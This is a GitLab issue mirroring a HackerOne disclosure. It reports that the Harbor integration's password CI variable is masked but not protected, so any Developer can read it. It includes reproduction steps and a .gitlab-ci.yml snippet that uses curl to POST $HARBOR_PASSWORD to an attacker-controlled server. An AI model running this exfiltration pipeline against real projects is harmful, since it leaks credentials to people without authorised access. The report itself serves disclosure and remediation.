Skip to content

Harbor integration passwords are not protected from users with Developer privelage

HackerOne report #1563325 by joaxcar on 2022-05-09, assigned to @nmalcolm:

Report | How To Reproduce

Report

Summary

Another integration secrets report. This one is not related to my previous ones using URL changes to extract secrets.

It might be that the described scenario is "intentional", but I could not find any mentions of it in the MR for the Harbor integration

!80999 (merged)

When configuring the Harbor integration the maintainer/owner of the project/group enters a username and a password. The password is entered in a "Password" field and hidden with dots. It is also not possible to see the configured password afterwards. The harbor integration comes with this information

After the Harbor integration is activated, global variables ‘HARBOR_USERNAME’, ‘HARBOR_PASSWORD’, ‘HARBOR_URL’ and ‘HARBOR_PROJECT’ will be created for CI/CD use.

And the fields are exposed as variables like this

    def ci_variables  
      return [] unless activated?

      [  
        { key: 'HARBOR_URL', value: url },  
        { key: 'HARBOR_PROJECT', value: project_name },  
        { key: 'HARBOR_USERNAME', value: username },  
        { key: 'HARBOR_PASSWORD', value: password, public: false, masked: true }  
      ]  
    end

The password variable is masked in any build logs. Though it is not protected. This allows any user that is allowed to run a CI pipeline in the project/group to extract the password by referencing it in a pipeline yaml file. Info about CI/CD security contains an example to use

build:  
  script:  
    - curl --request POST --data "secret_variable=$HARBOR_PASSWORD" "https://attacker.com"

This will post the password to the attackers site. This is how variables and CI/CD pipelines work in GitLab and there are some warnings sprinkled around in the documentation. There are however no warnings about this in the documentation for the Harbor integration. documentation

As the password is hidden and well protected in the integration settings page (making it impossible to view it there for the creator or other maintainers), it should be stated clearly that the password under normal circumstances is exposed to all users in the project with at least Developer role.

It might be that what is needed is just a documentation update (to H1 triager: in scope) but I think that the integration should default to having the variables made protected with the option to opt out if needed.

Steps to reproduce

Make sure to have a server where you can receive and view requests. I used https://webhook.site during testing

  1. Create two users, victim and attacker
  2. Log in as victim
  3. Create a project project01
  4. go to https://gitlab.com/GROUPNAME/project01/-/project_members and invite attacker as a Developer to the project
  5. Go to https://gitlab.com/GROUPNAME/project01/-/integrations/harbor/edit
  6. Configure Harbor with any URL, any username and a secret password, click save
  7. Log out and log in with attacker
  8. Go to https://gitlab.com/GROUPNAME/project01/-/branches/new and create a new branch called attack
  9. Go to https://gitlab.com/-/ide/project/GROUPNAME/project01/edit/attack/ this will open the webIDE
  10. Create a file named .gitlab-ci.yml and enter this content
build:  
  script:  
    - curl --request POST --data "secret_variable=$HARBOR_PASSWORD" "https://YOURSERVER.com"
  1. Click "Create commit" and then "Commit"
  2. Go to https://gitlab.com/GROUPNAME/project01/-/pipelines and you should see a pipeline running
  3. Go to the attacker server and see that a request have been made exposing the Harbor password
Impact

A user with Developer access to a project can leak the configured Harbor password

What is the current bug behavior?

The password variable is not protected by default and will therefore be exposed in ALL pipelines and branches. There are no warnings that the configured password will be accessible to all developers

What is the expected correct behavior?

The password variable should be protected per default and a warning should be present telling the maintainer that the password can be exposed.

Output of checks

This bug happens on GitLab.com

Impact

A user with Developer access to a project can leak the configured Harbor password

How To Reproduce

Please add reproducibility information to this section:

OSZAR »